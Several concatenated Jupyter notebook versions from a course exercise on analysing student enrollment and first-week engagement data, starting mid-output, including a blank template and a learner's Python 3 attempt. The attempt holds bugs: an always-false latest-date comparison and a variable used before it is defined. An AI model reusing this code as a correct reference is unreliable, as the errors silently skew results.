{u'status': u'canceled', u'is_udacity': False, u'is_canceled': True, u'join_date': datetime.datetime(2014, 11, 12, 0, 0), u'account_key': u'1219', u'cancel_date': datetime.datetime(2014, 11, 12, 0, 0), u'days_to_cancel': 0}
###Markdown
Checking for More Problem Records
###Code
#####################################
# 5 #
#####################################
## Find the number of surprising data points (enrollments missing from
## the engagement table) that remain, if any.
num_problem = 0
for enrollment in enrollments:
unique_enrolled_student = enrollment['account_key']
if unique_enrolled_student not in unique_engagement_students:
if enrollment['join_date'] != enrollment['cancel_date']:
print enrollment
num_problem += 1
print num_problem
###Output
{u'status': u'canceled', u'is_udacity': True, u'is_canceled': True, u'join_date': datetime.datetime(2015, 1, 10, 0, 0), u'account_key': u'1304', u'cancel_date': datetime.datetime(2015, 3, 10, 0, 0), u'days_to_cancel': 59}
{u'status': u'canceled', u'is_udacity': True, u'is_canceled': True, u'join_date': datetime.datetime(2015, 3, 10, 0, 0), u'account_key': u'1304', u'cancel_date': datetime.datetime(2015, 6, 17, 0, 0), u'days_to_cancel': 99}
{u'status': u'current', u'is_udacity': True, u'is_canceled': False, u'join_date': datetime.datetime(2015, 2, 25, 0, 0), u'account_key': u'1101', u'cancel_date': None, u'days_to_cancel': None}
3
###Markdown
Tracking Down the Remaining Problems
###Code
# Create a set of the account keys for all Udacity test accounts
udacity_test_accounts = set()
for enrollment in enrollments:
if enrollment['is_udacity']:
udacity_test_accounts.add(enrollment['account_key'])
len(udacity_test_accounts)
# Given some data with an account_key field, removes any records corresponding to Udacity test accounts
def remove_udacity_accounts(data):
non_udacity_data = []
for data_point in data:
if data_point['account_key'] not in udacity_test_accounts:
non_udacity_data.append(data_point)
return non_udacity_data
# Remove Udacity test accounts from all three tables
non_udacity_enrollments = remove_udacity_accounts(enrollments)
non_udacity_engagement = remove_udacity_accounts(daily_engagement)
non_udacity_submissions = remove_udacity_accounts(project_submissions)
print len(non_udacity_enrollments)
print len(non_udacity_engagement)
print len(non_udacity_submissions)
###Output
1622
135656
3634
###Markdown
Refining the Question
###Code
#####################################
# 6 #
#####################################
## Create a dictionary named paid_students containing all students who either
## haven't canceled yet or who remained enrolled for more than 7 days. The keys
## should be account keys, and the values should be the date the student enrolled.
paid_students = {}
for enrollment in non_udacity_enrollments:
if (not enrollment['is_canceled'] or enrollment['days_to_cancel'] > 7):
account_key = enrollment['account_key']
enrollment_date = enrollment['join_date']
if (account_key not in paid_students or enrollment_date > paid_students[account_key]):
paid_students[account_key] = enrollment_date
len(paid_students)
###Output
_____no_output_____
###Markdown
Getting Data from First Week
###Code
# Takes a student's join date and the date of a specific engagement record,
# and returns True if that engagement record happened within one week
# of the student joining.
def within_one_week(join_date, engagement_date):
time_delta = engagement_date - join_date
return time_delta.days >= 0 and time_delta.days < 7
#####################################
# 7 #
#####################################
## Create a list of rows from the engagement table including only rows where
## the student is one of the paid students you just found, and the date is within
## one week of the student's join date.
def remove_free_trial_cancels(data):
new_data = []
for data_point in data:
if data_point['account_key'] in paid_students:
new_data.append(data_point)
return new_data
paid_enrollment = remove_free_trial_cancels(non_udacity_enrollments)
paid_engagement = remove_free_trial_cancels(non_udacity_engagement)
paid_submission = remove_free_trial_cancels(non_udacity_submissions)
print len(paid_enrollment)
print len(paid_engagement)
print len(paid_submission)
paid_engagement_in_first_week = []
for engagement_record in paid_engagement:
account_key = engagement_record['account_key']
join_date = paid_students[account_key]
engagement_record_date = engagement_record['utc_date']
if within_one_week(join_date, engagement_record_date):
paid_engagement_in_first_week.append(engagement_record)
len(paid_engagement_in_first_week)
###Output
_____no_output_____
###Markdown
Exploring Student Engagement
###Code
from collections import defaultdict
# Create a dictionary of engagement grouped by student.
# The keys are account keys, and the values are lists of engagement records.
engagement_by_account = defaultdict(list)
for engagement_record in paid_engagement_in_first_week:
account_key = engagement_record['account_key']
engagement_by_account[account_key].append(engagement_record)
# Create a dictionary with the total minutes each student spent in the classroom during the first week.
# The keys are account keys, and the values are numbers (total minutes)
total_minutes_by_account = {}
for account_key, engagement_for_student in engagement_by_account.items():
total_minutes = 0
for engagement_record in engagement_for_student:
total_minutes += engagement_record['total_minutes_visited']
total_minutes_by_account[account_key] = total_minutes
import numpy as np
# Summarize the data about minutes spent in the classroom
total_minutes = total_minutes_by_account.values()
print 'Mean:', np.mean(total_minutes)
print 'Standard deviation:', np.std(total_minutes)
print 'Minimum:', np.min(total_minutes)
print 'Maximum:', np.max(total_minutes)
###Output
Mean: 306.708326753
Standard deviation: 412.996933409
Minimum: 0.0
Maximum: 3564.7332645
###Markdown
Debugging Data Analysis Code
###Code
#####################################
# 8 #
#####################################
## Go through a similar process as before to see if there is a problem.
## Locate at least one surprising piece of data, output it, and take a look at it.
student_with_max_minutes = None
max_minutes = 0
for student, total_minutes in total_minutes_by_account.items():
if total_minutes > max_minutes:
max_minutes = total_minutes
student_with_max_minutes = student
max_minutes
for engagement_record in paid_engagement_in_first_week:
if engagement_record['account_key'] == student_with_max_minutes:
print engagement_record
###Output
{u'lessons_completed': 4, u'num_courses_visited': 4, u'total_minutes_visited': 850.519339666, u'projects_completed': 0, 'account_key': u'163', u'utc_date': datetime.datetime(2015, 7, 9, 0, 0)}
{u'lessons_completed': 6, u'num_courses_visited': 6, u'total_minutes_visited': 872.633923334, u'projects_completed': 0, 'account_key': u'163', u'utc_date': datetime.datetime(2015, 7, 10, 0, 0)}
{u'lessons_completed': 6, u'num_courses_visited': 2, u'total_minutes_visited': 777.018903666, u'projects_completed': 0, 'account_key': u'163', u'utc_date': datetime.datetime(2015, 7, 11, 0, 0)}
{u'lessons_completed': 2, u'num_courses_visited': 1, u'total_minutes_visited': 294.568774, u'projects_completed': 0, 'account_key': u'163', u'utc_date': datetime.datetime(2015, 7, 12, 0, 0)}
{u'lessons_completed': 1, u'num_courses_visited': 3, u'total_minutes_visited': 471.2139785, u'projects_completed': 0, 'account_key': u'163', u'utc_date': datetime.datetime(2015, 7, 13, 0, 0)}
{u'lessons_completed': 1, u'num_courses_visited': 2, u'total_minutes_visited': 298.778345333, u'projects_completed': 0, 'account_key': u'163', u'utc_date': datetime.datetime(2015, 7, 14, 0, 0)}
{u'lessons_completed': 0, u'num_courses_visited': 0, u'total_minutes_visited': 0.0, u'projects_completed': 0, 'account_key': u'163', u'utc_date': datetime.datetime(2015, 7, 15, 0, 0)}
###Markdown
Lessons Completed in First Week
###Code
#####################################
# 9 #
#####################################
## Adapt the code above to find the mean, standard deviation, minimum, and maximum for
## the number of lessons completed by each student during the first week. Try creating
## one or more functions to re-use the code above.
from collections import defaultdict
def group_data(data, key_name):
grouped_data = defaultdict(list)
for data_point in data:
key = data_point[key_name]
grouped_data[key].append(data_point)
return grouped_data
engagement_by_account = group_data(paid_engagement_in_first_week,
'account_key')
def sum_grouped_items(grouped_data, field_name):
summed_data = {}
for key, data_points in grouped_data.items():
total = 0
for data_point in data_points:
total += data_point[field_name]
summed_data[key] = total
return summed_data
total_minutes_by_account = sum_grouped_items(engagement_by_account,
'total_minutes_visited')
import numpy as np
%pylab inline
import matplotlib.pyplot as plt
# Summarize the given data
def describe_data(data):
print 'Mean:', np.mean(data)
print 'Standard deviation:', np.std(data)
print 'Minimum:', np.min(data)
print 'Maximum:', np.max(data)
lessons_completed_by_account = sum_grouped_items(engagement_by_account,
'lessons_completed')
describe_data(lessons_completed_by_account.values())
###Output
Populating the interactive namespace from numpy and matplotlib
Mean: 1.63618090452
Standard deviation: 3.00256129983
Minimum: 0
Maximum: 36
###Markdown
Number of Visits in First Week
###Code
######################################
# 10 #
######################################
## Find the mean, standard deviation, minimum, and maximum for the number of
## days each student visits the classroom during the first week.
for engagement_record in paid_engagement:
if engagement_record['num_courses_visited'] > 0:
engagement_record['has_visited'] = 1
else:
engagement_record['has_visited'] = 0
days_visited_by_account = sum_grouped_items(engagement_by_account,
'has_visited')
describe_data(days_visited_by_account.values())
###Output
Mean: 2.86733668342
Standard deviation: 2.25519800292
Minimum: 0
Maximum: 7
###Markdown
Splitting out Passing Students
###Code
######################################
# 11 #
######################################
## Create two lists of engagement data for paid students in the first week.
## The first list should contain data for students who eventually pass the
## subway project, and the second list should contain data for students
## who do not.
subway_project_lesson_keys = ['746169184', '3176718735']
pass_subway_project = set()
for submission in paid_submission:
project = submission['lesson_key']
rating = submission['assigned_rating']
if ((project in subway_project_lesson_keys) and (rating == 'PASSED' or rating == 'DISTINCTION')):
pass_subway_project.add(submission['account_key'])
len(pass_subway_project)
passing_engagement = []
non_passing_engagement = []
for engagement_record in paid_engagement_in_first_week:
if engagement_record['account_key'] in pass_subway_project:
passing_engagement.append(engagement_record)
else:
non_passing_engagement.append(engagement_record)
print len(passing_engagement)
print len(non_passing_engagement)
###Output
4527
2392
###Markdown
Comparing the Two Student Groups
###Code
######################################
# 12 #
######################################
## Compute some metrics you're interested in and see how they differ for
## students who pass the subway project vs. students who don't. A good
## starting point would be the metrics we looked at earlier (minutes spent
## in the classroom, lessons completed, and days visited).
passing_engagement_by_account = group_data(passing_engagement, 'account_key')
non_passing_engagement_by_account = group_data(non_passing_engagement, 'account_key')
print 'non-passing students:'
non_passing_minutes = sum_grouped_items(non_passing_engagement_by_account, 'total_minutes_visited')
describe_data(non_passing_minutes.values())
print 'passing students:'
passing_minutes = sum_grouped_items(passing_engagement_by_account, 'total_minutes_visited')
describe_data(passing_minutes.values())
print 'non-passing students:'
non_passing_lessons = sum_grouped_items(non_passing_engagement_by_account, 'lessons_completed')
describe_data(non_passing_lessons.values())
print 'passing students:'
passing_lessons = sum_grouped_items(passing_engagement_by_account, 'lessons_completed')
describe_data(passing_lessons.values())
print 'non-passing students:'
non_passing_visits = sum_grouped_items(non_passing_engagement_by_account, 'has_visited')
describe_data(non_passing_visits.values())
print 'passing students:'
passing_visits = sum_grouped_items(passing_engagement_by_account, 'has_visited')
describe_data(passing_visits.values())
###Output
non-passing students:
Mean: 143.326474267
Standard deviation: 269.538619011
Minimum: 0.0
Maximum: 1768.52274933
passing students:
Mean: 394.586046484
Standard deviation: 448.499519327
Minimum: 0.0
Maximum: 3564.7332645
non-passing students:
Mean: 0.862068965517
Standard deviation: 2.54915994183
Minimum: 0
Maximum: 27
passing students:
Mean: 2.05255023184
Standard deviation: 3.14222705558
Minimum: 0
Maximum: 36
non-passing students:
Mean: 1.90517241379
Standard deviation: 1.90573144136
Minimum: 0
Maximum: 7
passing students:
Mean: 3.38485316847
Standard deviation: 2.25882147092
Minimum: 0
Maximum: 7
###Markdown
Making Histograms
###Code
######################################
# 13 #
######################################
## Make histograms of the three metrics we looked at earlier for both
## students who passed the subway project and students who didn't. You
## might also want to make histograms of any other metrics you examined.
non_passing_minutes = sum_grouped_items(non_passing_engagement_by_account, 'total_minutes_visited')
passing_minutes = sum_grouped_items(passing_engagement_by_account, 'total_minutes_visited')
describe_data(non_passing_minutes.values())
describe_data(passing_minutes.values())
plt.hist(passing_minutes.values())
plt.hist(non_passing_minutes.values())
passing_lessons = sum_grouped_items(passing_engagement_by_account, 'lessons_completed')
non_passing_lessons = sum_grouped_items(non_passing_engagement_by_account, 'lessons_completed')
describe_data(passing_lessons.values())
describe_data(non_passing_lessons.values())
plt.hist(passing_lessons.values())
plt.hist(non_passing_lessons.values())
non_passing_visits = sum_grouped_items(non_passing_engagement_by_account, 'has_visited')
passing_visits = sum_grouped_items(passing_engagement_by_account, 'has_visited')
describe_data(non_passing_visits.values())
describe_data(passing_visits.values())
plt.hist(passing_visits.values())
plt.hist(non_passing_visits.values())
###Output
Mean: 1.90517241379
Standard deviation: 1.90573144136
Minimum: 0
Maximum: 7
Mean: 3.38485316847
Standard deviation: 2.25882147092
Minimum: 0
Maximum: 7
###Markdown
Improving Plots and Sharing Findings
###Code
######################################
# 14 #
######################################
## Make a more polished version of at least one of your visualizations
## from earlier. Try importing the seaborn library to make the visualization
## look better, adding axis labels and a title, and changing one or more
## arguments to the hist() function.
import seaborn as sns
plt.hist(non_passing_visits.values(), bins=8)
plt.xlabel('Number of days')
plt.title('Distribution of classroom visits in the first week for students who do not pass the subway project')
plt.hist(passing_visits.values(), bins=8)
plt.xlabel('Number of days')
plt.title('Distribution of classroom visits in the first week for students who pass the subway project')
###Output
_____no_output_____
###Markdown
Before we get started, a couple of reminders to keep in mind when using iPython notebooks:- Remember that you can see from the left side of a code cell when it was last run if there is a number within the brackets.- When you start a new notebook session, make sure you run all of the cells up to the point where you last left off. Even if the output is still visible from when you ran the cells in your previous session, the kernel starts in a fresh state so you'll need to reload the data, etc. on a new session.- The previous point is useful to keep in mind if your answers do not match what is expected in the lesson's quizzes. Try reloading the data and run all of the processing steps one by one in order to make sure that you are working with the same variables and data that are at each quiz stage. Load Data from CSVs
###Code
import unicodecsv
## Longer version of code (replaced with shorter, equivalent version below)
# enrollments = []
# f = open('enrollments.csv', 'rb')
# reader = unicodecsv.DictReader(f)
# for row in reader:
# enrollments.append(row)
# f.close()
with open('data/enrollments.csv', 'rb') as f:
reader = unicodecsv.DictReader(f)
enrollments = list(reader)
enrollments[0]
#####################################
# 1 #
#####################################
## Read in the data from daily_engagement.csv and project_submissions.csv
## and store the results in the below variables.
## Then look at the first row of each table.
def read_csf(filename):
with open(filename, 'rb') as f:
reader = unicodecsv.DictReader(f)
return list(reader)
daily_engagement = read_csf('data/daily_engagement.csv')
project_submissions = read_csf('data/project_submissions.csv')
print daily_engagement[0]
print project_submissions[0]
###Output
{u'lessons_completed': u'0.0', u'num_courses_visited': u'1.0', u'total_minutes_visited': u'11.6793745', u'projects_completed': u'0.0', u'acct': u'0', u'utc_date': u'2015-01-09'}
{u'lesson_key': u'3176718735', u'processing_state': u'EVALUATED', u'account_key': u'256', u'assigned_rating': u'UNGRADED', u'completion_date': u'2015-01-16', u'creation_date': u'2015-01-14'}
###Markdown
Fixing Data Types
###Code
from datetime import datetime as dt
# Takes a date as a string, and returns a Python datetime object.
# If there is no date given, returns None
def parse_date(date):
if date == '':
return None
else:
return dt.strptime(date, '%Y-%m-%d')
# Takes a string which is either an empty string or represents an integer,
# and returns an int or None.
def parse_maybe_int(i):
if i == '':
return None
else:
return int(i)
# Clean up the data types in the enrollments table
for enrollment in enrollments:
enrollment['cancel_date'] = parse_date(enrollment['cancel_date'])
enrollment['days_to_cancel'] = parse_maybe_int(enrollment['days_to_cancel'])
enrollment['is_canceled'] = enrollment['is_canceled'] == 'True'
enrollment['is_udacity'] = enrollment['is_udacity'] == 'True'
enrollment['join_date'] = parse_date(enrollment['join_date'])
enrollments[0]
# Clean up the data types in the engagement table
for engagement_record in daily_engagement:
engagement_record['lessons_completed'] = int(float(engagement_record['lessons_completed']))
engagement_record['num_courses_visited'] = int(float(engagement_record['num_courses_visited']))
engagement_record['projects_completed'] = int(float(engagement_record['projects_completed']))
engagement_record['total_minutes_visited'] = float(engagement_record['total_minutes_visited'])
engagement_record['utc_date'] = parse_date(engagement_record['utc_date'])
daily_engagement[0]
# Clean up the data types in the submissions table
for submission in project_submissions:
submission['completion_date'] = parse_date(submission['completion_date'])
submission['creation_date'] = parse_date(submission['creation_date'])
project_submissions[0]
###Output
_____no_output_____
###Markdown
Note when running the above cells that we are actively changing the contents of our data variables. If you try to run these cells multiple times in the same session, an error will occur. Investigating the Data
###Code
#####################################
# 2 #
#####################################
## Find the total number of rows and the number of unique students (account keys)
## in each table.
enrollment_num_rows = len(enrollments)
student_list = [i['account_key'] for i in enrollments]
enrollment_num_unique_students = len(set(student_list))
print enrollment_num_rows
print enrollment_num_unique_students
engagement_num_rows = len(daily_engagement)
student_list = [i['acct'] for i in daily_engagement]
engagement_num_unique_students = len(set(student_list))
print engagement_num_rows
print engagement_num_unique_students
submission_num_rows = len(project_submissions)
student_list = [i['account_key'] for i in project_submissions]
submission_num_unique_students = len(set(student_list))
print submission_num_rows
print submission_num_unique_students
###Output
3642
743
###Markdown
Problems in the Data
###Code
#####################################
# 3 #
#####################################
## Rename the "acct" column in the daily_engagement table to "account_key".
for i in daily_engagement:
i['account_key'] = i['acct']
del i['acct']
daily_engagement[0]['account_key']
###Output
_____no_output_____
###Markdown
Missing Engagement Records
###Code
#####################################
# 4 #
#####################################
## Find any one student enrollments where the student is missing from the daily engagement table.
## Output that enrollment.
###Output
_____no_output_____
###Markdown
Checking for More Problem Records
###Code
#####################################
# 5 #
#####################################
## Find the number of surprising data points (enrollments missing from
## the engagement table) that remain, if any.
###Output
_____no_output_____
###Markdown
Tracking Down the Remaining Problems
###Code
# Create a set of the account keys for all Udacity test accounts
udacity_test_accounts = set()
for enrollment in enrollments:
if enrollment['is_udacity']:
udacity_test_accounts.add(enrollment['account_key'])
len(udacity_test_accounts)
# Given some data with an account_key field, removes any records corresponding to Udacity test accounts
def remove_udacity_accounts(data):
non_udacity_data = []
for data_point in data:
if data_point['account_key'] not in udacity_test_accounts:
non_udacity_data.append(data_point)
return non_udacity_data
# Remove Udacity test accounts from all three tables
non_udacity_enrollments = remove_udacity_accounts(enrollments)
non_udacity_engagement = remove_udacity_accounts(daily_engagement)
non_udacity_submissions = remove_udacity_accounts(project_submissions)
print len(non_udacity_enrollments)
print len(non_udacity_engagement)
print len(non_udacity_submissions)
###Output
1622
135656
3634
###Markdown
Refining the Question
###Code
#####################################
# 6 #
#####################################
## Create a dictionary named paid_students containing all students who either
## haven't canceled yet or who remained enrolled for more than 7 days. The keys
## should be account keys, and the values should be the date the student enrolled.
paid_students =
###Output
_____no_output_____
###Markdown
Getting Data from First Week
###Code
# Takes a student's join date and the date of a specific engagement record,
# and returns True if that engagement record happened within one week
# of the student joining.
def within_one_week(join_date, engagement_date):
time_delta = engagement_date - join_date
return time_delta.days < 7
#####################################
# 7 #
#####################################
## Create a list of rows from the engagement table including only rows where
## the student is one of the paid students you just found, and the date is within
## one week of the student's join date.
paid_engagement_in_first_week =
###Output
_____no_output_____
###Markdown
Exploring Student Engagement
###Code
from collections import defaultdict
# Create a dictionary of engagement grouped by student.
# The keys are account keys, and the values are lists of engagement records.
engagement_by_account = defaultdict(list)
for engagement_record in paid_engagement_in_first_week:
account_key = engagement_record['account_key']
engagement_by_account[account_key].append(engagement_record)
# Create a dictionary with the total minutes each student spent in the classroom during the first week.
# The keys are account keys, and the values are numbers (total minutes)
total_minutes_by_account = {}
for account_key, engagement_for_student in engagement_by_account.items():
total_minutes = 0
for engagement_record in engagement_for_student:
total_minutes += engagement_record['total_minutes_visited']
total_minutes_by_account[account_key] = total_minutes
import numpy as np
# Summarize the data about minutes spent in the classroom
total_minutes = total_minutes_by_account.values()
print 'Mean:', np.mean(total_minutes)
print 'Standard deviation:', np.std(total_minutes)
print 'Minimum:', np.min(total_minutes)
print 'Maximum:', np.max(total_minutes)
###Output
_____no_output_____
###Markdown
Debugging Data Analysis Code
###Code
#####################################
# 8 #
#####################################
## Go through a similar process as before to see if there is a problem.
## Locate at least one surprising piece of data, output it, and take a look at it.
###Output
_____no_output_____
###Markdown
Lessons Completed in First Week
###Code
#####################################
# 9 #
#####################################
## Adapt the code above to find the mean, standard deviation, minimum, and maximum for
## the number of lessons completed by each student during the first week. Try creating
## one or more functions to re-use the code above.
###Output
_____no_output_____
###Markdown
Number of Visits in First Week
###Code
######################################
# 10 #
######################################
## Find the mean, standard deviation, minimum, and maximum for the number of
## days each student visits the classroom during the first week.
###Output
_____no_output_____
###Markdown
Splitting out Passing Students
###Code
######################################
# 11 #
######################################
## Create two lists of engagement data for paid students in the first week.
## The first list should contain data for students who eventually pass the
## subway project, and the second list should contain data for students
## who do not.
subway_project_lesson_keys = ['746169184', '3176718735']
passing_engagement =
non_passing_engagement =
###Output
_____no_output_____
###Markdown
Comparing the Two Student Groups
###Code
######################################
# 12 #
######################################
## Compute some metrics you're interested in and see how they differ for
## students who pass the subway project vs. students who don't. A good
## starting point would be the metrics we looked at earlier (minutes spent
## in the classroom, lessons completed, and days visited).
###Output
_____no_output_____
###Markdown
Making Histograms
###Code
######################################
# 13 #
######################################
## Make histograms of the three metrics we looked at earlier for both
## students who passed the subway project and students who didn't. You
## might also want to make histograms of any other metrics you examined.
###Output
_____no_output_____
###Markdown
Improving Plots and Sharing Findings
###Code
######################################
# 14 #
######################################
## Make a more polished version of at least one of your visualizations
## from earlier. Try importing the seaborn library to make the visualization
## look better, adding axis labels and a title, and changing one or more
## arguments to the hist() function.
###Output
_____no_output_____
###Markdown
Before we get started, a couple of reminders to keep in mind when using iPython notebooks:- Remember that you can see from the left side of a code cell when it was last run if there is a number within the brackets.- When you start a new notebook session, make sure you run all of the cells up to the point where you last left off. Even if the output is still visible from when you ran the cells in your previous session, the kernel starts in a fresh state so you'll need to reload the data, etc. on a new session.- The previous point is useful to keep in mind if your answers do not match what is expected in the lesson's quizzes. Try reloading the data and run all of the processing steps one by one in order to make sure that you are working with the same variables and data that are at each quiz stage. Load Data from CSVs
###Code
import unicodecsv
## Longer version of code (replaced with shorter, equivalent version below)
# enrollments = []
# f = open('enrollments.csv', 'rb')
# reader = unicodecsv.DictReader(f)
# for row in reader:
# enrollments.append(row)
# f.close()
with open('enrollments.csv', 'rb') as f:
reader = unicodecsv.DictReader(f)
enrollments = list(reader)
enrollments[0]
## Read in the data from daily_engagement.csv and project_submissions.csv
## and store the results in the below variables.
## Then look at the first row of each table.
with open('daily_engagement.csv', 'rb') as f:
reader = unicodecsv.DictReader(f)
daily_engagement = list(reader)
daily_engagement[0]
with open('project_submissions.csv', 'rb') as f:
reader = unicodecsv.DictReader(f)
project_submissions = list(reader)
project_submissions[0]
###Output
_____no_output_____
###Markdown
Fixing Data Types
###Code
from datetime import datetime as dt
# Next function Takes a date as a string, and returns a Python datetime object.
# If there is no date given, returns None
# This date parser assumes - month/date/year format
def parse_date_mdy(date):
if date == '':
return None
else:
return dt.strptime(date, '%m/%d/%Y')
# Next function Takes a date as a string, and returns a Python datetime object.
# If there is no date given, returns None
# This date parser assumes - year-month-date format
def parse_date_ymd(date):
if date == '':
return None
else:
date_string = dt.strptime(date, '%Y-%m-%d').strftime('%m/%d/%Y')
return dt.strptime(date_string, '%m/%d/%Y')
# Takes a string which is either an empty string or represents an integer,
# and returns an int or None.
def parse_maybe_int(i):
if i == '':
return None
else:
return int(i)
# Clean up the data types in the enrollments table
for enrollment in enrollments:
enrollment['cancel_date'] = parse_date_mdy(enrollment['cancel_date'])
enrollment['days_to_cancel'] = parse_maybe_int(enrollment['days_to_cancel'])
enrollment['is_canceled'] = enrollment['is_canceled'] == 'TRUE'
enrollment['is_udacity'] = enrollment['is_udacity'] == 'TRUE'
enrollment['join_date'] = parse_date_mdy(enrollment['join_date'])
enrollments[0]
for engagement_record in daily_engagement:
engagement_record['account_key'] = engagement_record['acct']
del engagement_record['acct']
daily_engagement[0]
# Clean up the data types in the engagement table
for engagement_record in daily_engagement:
engagement_record['lessons_completed'] = int(float(engagement_record['lessons_completed']))
engagement_record['num_courses_visited'] = int(float(engagement_record['num_courses_visited']))
engagement_record['projects_completed'] = int(float(engagement_record['projects_completed']))
engagement_record['total_minutes_visited'] = float(engagement_record['total_minutes_visited'])
engagement_record['utc_date'] = parse_date_mdy(engagement_record['utc_date'])
daily_engagement[0]
# Clean up the data types in the submissions table
for submission in project_submissions:
submission['completion_date'] = parse_date_ymd(submission['completion_date'])
submission['creation_date'] = parse_date_ymd(submission['creation_date'])
project_submissions[0]
###Output
_____no_output_____
###Markdown
Note when running the above cells that we are actively changing the contents of our data variables. If you try to run these cells multiple times in the same session, an error will occur. Investigating the Data
###Code
def get_unique_students(data):
unique_students = set()
for data_point in data:
unique_students.add(data_point['account_key'])
return unique_students
unique_enrollments = get_unique_students(enrollments)
print(len(unique_enrollments))
print(len(enrollments))
unique_daily_engagement = get_unique_students(daily_engagement)
print(len(unique_daily_engagement))
print(len(daily_engagement))
unique_submission = get_unique_students(project_submissions)
print(len(unique_submission))
print(len(project_submissions))
###Output
1302
1640
1237
136240
743
3642
###Markdown
Problems in the Data Missing Engagement Records
###Code
## Find any student enrollment(s) where the student is missing from the daily engagement table.
for enrollment in enrollments:
student = enrollment['account_key']
if student not in unique_daily_engagement and enrollment['join_date'] != enrollment['cancel_date']:
print(student)
#These output accounts are all udacity test accounts.
###Output
1304
1304
1101
###Markdown
Tracking Down the Remaining Problems
###Code
# Create a set of the account keys for all Udacity test accounts
udacity_test_accounts = set()
for enrollment in enrollments:
if enrollment['is_udacity']:
udacity_test_accounts.add(enrollment['account_key'])
udacity_test_accounts
# Given some data with an account_key field, removes any records corresponding to Udacity test accounts
def remove_udacity_accounts(data):
non_udacity_data = []
for data_point in data:
if data_point['account_key'] not in udacity_test_accounts:
non_udacity_data.append(data_point)
return non_udacity_data
# Remove Udacity test accounts from all three tables
non_udacity_enrollments = remove_udacity_accounts(enrollments)
non_udacity_engagement = remove_udacity_accounts(daily_engagement)
non_udacity_submissions = remove_udacity_accounts(project_submissions)
print(len(non_udacity_enrollments))
print(len(non_udacity_engagement))
print(len(non_udacity_submissions))
for engagement_record in paid_engagement:
if engagement_record['num_courses_visited'] > 0:
engagement_record['has_visited'] = 1
else:
engagement_record['has_visited'] = 0
###Output
_____no_output_____
###Markdown
Refining the Question
###Code
## Create a dictionary named paid_students containing all students who either
## haven't canceled yet or who remained enrolled for more than 7 days (first 7 days are free in udacity). The keys
## should be account keys, and the values should be the date the student enrolled.
paid_students = {}
for enrollment in non_udacity_enrollments:
if not enrollment['is_canceled'] or enrollment['days_to_cancel'] > 7:
account_key = enrollment['account_key']
enrollment_date = enrollment['join_date']
# Since a student can enroll multiple times, we need to store the latest enrollment date for students
if account_key not in paid_students or enrollment_date > enrollment['join_date']:
paid_students[account_key] = enrollment_date
len(paid_students)
###Output
_____no_output_____
###Markdown
Getting Data from First Week
###Code
# Takes a student's join date and the date of a specific engagement record,
# and returns True if that engagement record happened within one week
# of the student joining.
def within_one_week(join_date, engagement_date):
time_delta = engagement_date - join_date
return time_delta.days < 7 and time_delta.days >= 0
""" Create a list of rows from the engagement table including only rows where
the student is one of the paid students you just found, and the date is within
one week of the student's join date.
"""
def remove_free_trial_cancels(data):
new_data = []
for data_point in data:
if data_point['account_key'] in paid_students:
new_data.append(data_point)
return new_data
paid_enrollments = remove_free_trial_cancels(non_udacity_enrollments)
paid_engagement = remove_free_trial_cancels(non_udacity_engagement)
paid_submissions = remove_free_trial_cancels(non_udacity_submissions)
print(len(paid_enrollments))
print(len(paid_engagement))
print(len(paid_submissions))
paid_engagement_in_first_week = []
for engagement_record in paid_engagement:
account_key = engagement_record['account_key']
join_date = paid_students[account_key]
engagement_record_date = engagement_record['utc_date']
if within_one_week(join_date, engagement_record_date): # Problem is here because length of other lists is correct.
paid_engagement_in_first_week.append(engagement_record)
len(paid_engagement_in_first_week)
###Output
1293
134549
3618
###Markdown
Exploring Student Engagement
###Code
from collections import defaultdict
import numpy as np
# Create a dictionary of engagement grouped by student.
# The keys are account keys, and the values are lists of engagement records.
engagement_by_account = defaultdict(list)
for engagement_record in paid_engagement_in_first_week:
account_key = engagement_record['account_key']
engagement_by_account[account_key].append(engagement_record)
# Create a dictionary with the total minutes each student spent in the classroom during the first week.
# The keys are account keys, and the values are numbers (total minutes)
total_minutes_by_account = {}
for account_key, engagement_for_student in engagement_by_account.items():
total_minutes = 0
for engagement_record in engagement_for_student:
total_minutes += engagement_record['total_minutes_visited']
total_minutes_by_account[account_key] = total_minutes
# In python3, dict.values returns a dict_values object, which is not a list or tuple. Try coercing that into a list.
total_minutes = list(total_minutes_by_account.values())
print('Mean:', np.mean(total_minutes))
print('Standard deviation:', np.std(total_minutes))
print('Minimum:', np.min(total_minutes))
print('Maximum:', np.max(total_minutes))
###Output
Mean: 325.7850653949317
Standard deviation: 418.40526409921097
Minimum: 0.0
Maximum: 3564.7332645
###Markdown
Debugging Data Analysis Code
###Code
## Locate at least one surprising piece of data, output it, and take a look at it.
student_with_max_mintutes = None
max_minutes = 0
for student, total_minutes in total_minutes_by_account.items():
if total_minutes > max_minutes:
max_minutes = total_minutes
student_with_max_mintutes = student # student's account_key with maximum minutes stored
# print(max_minutes)
for engagement_record in paid_engagement_in_first_week:
if engagement_record['account_key'] == student_with_max_mintutes:
print(engagement_record)
###Output
OrderedDict([('utc_date', datetime.datetime(2015, 7, 9, 0, 0)), ('num_courses_visited', 4), ('total_minutes_visited', 850.5193397), ('lessons_completed', 4), ('projects_completed', 0), ('account_key', '163'), ('has_visited', 1)])
OrderedDict([('utc_date', datetime.datetime(2015, 7, 10, 0, 0)), ('num_courses_visited', 6), ('total_minutes_visited', 872.6339233), ('lessons_completed', 6), ('projects_completed', 0), ('account_key', '163'), ('has_visited', 1)])
OrderedDict([('utc_date', datetime.datetime(2015, 7, 11, 0, 0)), ('num_courses_visited', 2), ('total_minutes_visited', 777.0189037), ('lessons_completed', 6), ('projects_completed', 0), ('account_key', '163'), ('has_visited', 1)])
OrderedDict([('utc_date', datetime.datetime(2015, 7, 12, 0, 0)), ('num_courses_visited', 1), ('total_minutes_visited', 294.568774), ('lessons_completed', 2), ('projects_completed', 0), ('account_key', '163'), ('has_visited', 1)])
OrderedDict([('utc_date', datetime.datetime(2015, 7, 13, 0, 0)), ('num_courses_visited', 3), ('total_minutes_visited', 471.2139785), ('lessons_completed', 1), ('projects_completed', 0), ('account_key', '163'), ('has_visited', 1)])
OrderedDict([('utc_date', datetime.datetime(2015, 7, 14, 0, 0)), ('num_courses_visited', 2), ('total_minutes_visited', 298.7783453), ('lessons_completed', 1), ('projects_completed', 0), ('account_key', '163'), ('has_visited', 1)])
OrderedDict([('utc_date', datetime.datetime(2015, 7, 15, 0, 0)), ('num_courses_visited', 0), ('total_minutes_visited', 0.0), ('lessons_completed', 0), ('projects_completed', 0), ('account_key', '163'), ('has_visited', 0)])
###Markdown
Lessons Completed in First Week
###Code
